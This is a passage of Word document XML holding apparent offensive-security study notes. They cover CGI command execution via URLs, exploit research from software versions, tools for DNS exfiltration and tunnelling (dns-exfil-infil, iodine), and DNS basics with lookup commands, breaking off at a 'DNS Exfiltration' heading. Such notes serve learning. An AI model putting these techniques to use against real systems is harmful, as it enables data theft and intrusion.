    <w:p w14:paraId="21C285C2" w14:textId="5F3D781E" w:rsidR="00001CA3" w:rsidRDefault="00001CA3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>common place for CGI scripts is within /cgi-bin/ folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543607AA" w14:textId="28D378E1" w:rsidR="00001CA3" w:rsidRDefault="00001CA3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>scripts, when navigated to, may execute in browser – giving the potential for command execution within the URL</w:t>
      </w:r>
      <w:r w:rsidR="00EA090E">
        <w:t xml:space="preserve"> (with URL encoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE489D4" w14:textId="76C97807" w:rsidR="00EA090E" w:rsidRDefault="00EA090E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Discovering versions can allow research to reveal exploitations that can be deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0E8C8C" w14:textId="2D28DD02" w:rsidR="00462714" w:rsidRDefault="00462714" w:rsidP="00462714">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D32EC22" w14:textId="6087C67F" w:rsidR="00462714" w:rsidRDefault="009900C2" w:rsidP="00462714">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D6E627" w14:textId="61315D67" w:rsidR="009900C2" w:rsidRDefault="009900C2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEDE80C" w14:textId="206DAE05" w:rsidR="009900C2" w:rsidRDefault="009900C2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dns-exfil-infil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB9A9D1" w14:textId="5C56F005" w:rsidR="009900C2" w:rsidRDefault="009900C2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>iodine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42CD2E" w14:textId="326C6CD9" w:rsidR="009900C2" w:rsidRDefault="009900C2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04989727" w14:textId="276E4835" w:rsidR="009900C2" w:rsidRDefault="009900C2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Custom DNS Server Setup [optional]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD4DBCA" w14:textId="2E4D5C6D" w:rsidR="009900C2" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId218" w:history="1">
        <w:r w:rsidR="00641261" w:rsidRPr="009E2FCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=p8wbebEgtDk</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6199A6C5" w14:textId="418E3921" w:rsidR="00641261" w:rsidRDefault="00641261" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>What is DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08327F8F" w14:textId="3252AF78" w:rsidR="00641261" w:rsidRDefault="00641261" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Name System refers to a naming system that resolves domain names with IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29225EC5" w14:textId="4C11F80E" w:rsidR="00641261" w:rsidRDefault="00641261" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS servers are distributed across the world and are constantly updated and synched with one another</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68661CE8" w14:textId="3505AC66" w:rsidR="00641261" w:rsidRDefault="00641261" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS translates domain name requests users make into IP addresses, this translation travels along a hierarchy of servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B398C0" w14:textId="2A5BB8E4" w:rsidR="00641261" w:rsidRDefault="00641261" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Root – top level domain zones (.com, .net, .org)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD0D7F3" w14:textId="6FD0E0B6" w:rsidR="00641261" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId219" w:history="1">
        <w:r w:rsidR="00641261" w:rsidRPr="009E2FCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cloudflare.com/learning/dns/glossary/dns-root-server/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15D55C36" w14:textId="27EA3F6A" w:rsidR="00641261" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId220" w:history="1">
        <w:r w:rsidR="00641261" w:rsidRPr="009E2FCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cloudflare.com/learning/dns/glossary/dns-root-server/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A97DF8D" w14:textId="3DD5FD99" w:rsidR="00641261" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId221" w:history="1">
        <w:r w:rsidR="00641261" w:rsidRPr="009E2FCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cloudflare.com/learning/dns/glossary/dns-zone/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55D9EE65" w14:textId="7BFF18A7" w:rsidR="00641261" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId222" w:history="1">
        <w:r w:rsidR="00641261" w:rsidRPr="009E2FCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.iana.org/domains/root/servers</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E36EDC4" w14:textId="2A510E05" w:rsidR="00641261" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId223" w:history="1">
        <w:r w:rsidR="00641261" w:rsidRPr="009E2FCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cloudflare.com/learning/dns/dns-records/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50943A0F" w14:textId="484168A3" w:rsidR="00641261" w:rsidRDefault="00641261" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>to query a text record from a website</w:t>
      </w:r>
      <w:r w:rsidR="002D0370">
        <w:t xml:space="preserve"> on windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A2BDEC" w14:textId="04E4B3DF" w:rsidR="00641261" w:rsidRDefault="00641261" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nslookup -type=txt </w:t>
      </w:r>
      <w:r w:rsidR="002D0370">
        <w:t>website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D52C28" w14:textId="54D7F2CC" w:rsidR="002D0370" w:rsidRDefault="002D0370" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to query a text record from a website on linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8A6D79" w14:textId="75184FF4" w:rsidR="002D0370" w:rsidRDefault="002D0370" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dig website.com txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C036A8" w14:textId="484C4540" w:rsidR="002D0370" w:rsidRDefault="002D0370" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AAAA stores IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31098E87" w14:textId="3A057181" w:rsidR="002D0370" w:rsidRDefault="002D0370" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS TXT records store maximum 255 characters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE0466A" w14:textId="35EDCD82" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Domain Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF1C85E" w14:textId="459F2426" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Root Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A98AE" w14:textId="7929486E" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>“.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210E506C" w14:textId="797C7ABC" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>TLD (Top-Level Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377D67F2" w14:textId="799FAC99" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">General Top Level </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2CE0B6" w14:textId="7DAD5361" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.edu, .com, .gov, .mil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D649C5B" w14:textId="64D71465" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Country Code Top Level Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A365F8D" w14:textId="667438B7" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.ca, .co.uk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B0B40D" w14:textId="458E11D0" w:rsidR="00AE7393" w:rsidRDefault="00AE7393" w:rsidP="00AE7393">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Second Level Domain</w:t>
      </w:r>
      <w:r w:rsidR="00441ABD">
        <w:tab/>
        <w:t>limited to 63 characters, a-z 0-9 and hyphens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764E1FD1" w14:textId="6A102381" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082EF6F1" w14:textId="77F89D37" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>left hand side of Second-Level Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B4356D" w14:textId="5650A034" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>same creation restrictions as Second Level Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1ECDB8" w14:textId="6649C720" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no limit to number of subdomains created for domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3768FC27" w14:textId="6DD02EAB" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Record Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669B4862" w14:textId="512187AB" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>A Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E9E24" w14:textId="4D0865A9" w:rsidR="00C707D2" w:rsidRDefault="00C707D2" w:rsidP="00C707D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nslookup - -type=A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F345D5F" w14:textId="3E16BBFA" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AAAA Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093641D6" w14:textId="31885B9B" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CNAME Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572F11EA" w14:textId="1CF0EEC6" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nslookup –type=CNAME website.&lt;ext&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A234B" w14:textId="403D3E47" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>MX Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088AEE22" w14:textId="3F162F4E" w:rsidR="001A48A8" w:rsidRDefault="00C707D2" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nslookup - -type=MX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8BA645" w14:textId="6204EAAF" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>TXT Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC23B9" w14:textId="014B4907" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nslookup –type=TXT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0E5681" w14:textId="37654AAF" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Request Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA32B7C" w14:textId="1E190D50" w:rsidR="00441ABD" w:rsidRDefault="00441ABD" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Local Cache is checked first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42206C63" w14:textId="627F2B38" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="00441ABD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>If not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A9E2F4" w14:textId="5C9E3283" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Recursive DNS Server is requested, which also checks local cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C04C546" w14:textId="3AB531F1" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>If not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5449B27B" w14:textId="57D95E35" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Internet Root DNS Servers are requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FFF12B" w14:textId="265512CC" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Redirects to TLDs and Authoritative Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BED3A2" w14:textId="238B80B0" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Responsible for storing DNS records for a particular domain name and any updates for domain name DNS records would be made</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D49344" w14:textId="1DAA83A0" w:rsidR="001A48A8" w:rsidRDefault="001A48A8" w:rsidP="001A48A8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Measured in TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03573808" w14:textId="30EF7BAF" w:rsidR="002D0370" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E68A7E3" w14:textId="76145489" w:rsidR="00052E31" w:rsidRDefault="00052E31" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
